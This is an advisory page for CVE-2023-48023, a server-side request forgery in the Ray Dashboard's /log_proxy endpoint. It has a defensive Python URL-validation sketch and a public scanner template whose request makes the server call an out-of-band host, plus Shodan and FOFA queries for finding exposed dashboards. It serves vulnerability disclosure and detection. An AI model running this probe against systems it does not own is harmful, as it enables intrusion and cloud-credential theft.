CVE-2023-48023: Anyscale Ray 2.6.3 and 2.8.0 - Server-Side Request Forgery

Date: 2025-08-01 | Affected software: Anyscale Ray | PoC: public

Vulnerability description

The Ray Dashboard API is affected by a Server-Side Request Forgery (SSRF) vulnerability in the url parameter of the /log_proxy API endpoint. The API does not sufficiently validate this parameter and accepts any HTTP or HTTPS URL as valid.
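For contrast with "any HTTP or HTTPS URL is accepted", here is a sketch of the target validation a log-proxy endpoint could apply before fetching. It is an added example, not Ray's code or its fix; the helper name `check_log_proxy_url`, the node addresses and the agent port are constructed assumptions.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed sample values (assumptions, not taken from Ray or the advisory).
CLUSTER_NODES = {ipaddress.ip_address("10.0.1.11"), ipaddress.ip_address("10.0.1.12")}
AGENT_PORTS = {52365}


def check_log_proxy_url(url, nodes=CLUSTER_NODES, ports=AGENT_PORTS):
    """Hypothetical helper: return (allowed, reason) for a proxy target URL."""
    try:
        parts = urlsplit(url)
        port = parts.port  # raises ValueError when the port is out of range
    except ValueError:
        return False, "unparseable URL"
    if parts.scheme not in ("http", "https"):
        return False, "scheme not allowed"
    if parts.username is not None or parts.password is not None:
        return False, "userinfo not allowed"
    if not parts.hostname:
        return False, "missing host"
    try:
        # Only strict IP literals pass; names and decimal/hex forms are refused,
        # so no DNS lookup happens between this check and the fetch.
        addr = ipaddress.ip_address(parts.hostname)
    except ValueError:
        return False, "host is not an IP literal"
    # Judge IPv4-mapped IPv6 (::ffff:a.b.c.d) by the IPv4 address it carries.
    mapped = getattr(addr, "ipv4_mapped", None)
    if mapped is not None:
        addr = mapped
    if addr.is_link_local or addr.is_loopback:
        return False, "link-local or loopback target"
    if addr not in nodes:
        return False, "not a known cluster node"
    if port not in ports:
        return False, "port not allowed"
    return True, "ok"


if __name__ == "__main__":
    for u in ("http://10.0.1.11:52365/logs", "http://169.254.169.254/",
              "http://[::ffff:169.254.169.254]/", "http://example.com/"):
        print(u, check_log_proxy_url(u))
```

The fetch that follows such a check should not follow HTTP redirects, because a redirect issued by an allowed node would otherwise bypass the validation.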

PoC code [public]

id: CVE-2023-48023

info:
  name: Anyscale Ray 2.6.3 and 2.8.0 - Server-Side Request Forgery
  author: cookiehanhoan,harryha
  severity: critical
  description: |
    The Ray Dashboard API is affected by a Server-Side Request Forgery (SSRF) vulnerability in the url parameter of the /log_proxy API endpoint. The API does not perform sufficient input validation within the affected parameter and any HTTP or HTTPS URLs are accepted as valid.
  impact: |
    The issue is exploitable without authentication and is dependent only on network connectivity to the Ray Dashboard port (8265 by default). The vulnerability could be exploited to retrieve the highly privileged IAM credentials required by Ray from the AWS metadata API. As an impact it is known to affect confidentiality, integrity, and availability.
  remediation: Update to the latest version
  reference:
    - https://bishopfox.com/blog/ray-versions-2-6-3-2-8-0
    - https://huntr.com/bounties/448bcada-9f6f-442e-8950-79f41efacfed/
    - https://security.snyk.io/vuln/SNYK-PYTHON-RAY-6096054
    - https://nvd.nist.gov/vuln/detail/CVE-2023-48023
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2023-48023
    cwe-id: CWE-441,CWE-918
    epss-score: 0.84942
    epss-percentile: 0.99301
  metadata:
    verified: true
    max-request: 1
    vendor: ray_project
    shodan-query:
      - http.favicon.hash:463802404
      - http.html:"ray dashboard"
    product: ray
    fofa-query:
      - icon_hash=463802404
      - body="ray dashboard"
  tags: cve,cve2023,ssrf,ray,anyscale,Anyscale

http:
  - method: GET
    path:
      - "{{BaseURL}}/log_proxy?url=http://{{interactsh-url}}"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: body
        words:
          - "<h1> Interactsh Server </h1>"
# digest: 4a0a00473045022100fdf6a2c3db6df25b196e3af40174c811dbd2f1bdcb1c25ad3400196aa411b759022062940c561b1ac1cedc558d547540c59a04591572587a50f64511193033a15850:922c64590222798bb761d5b6d8e72950
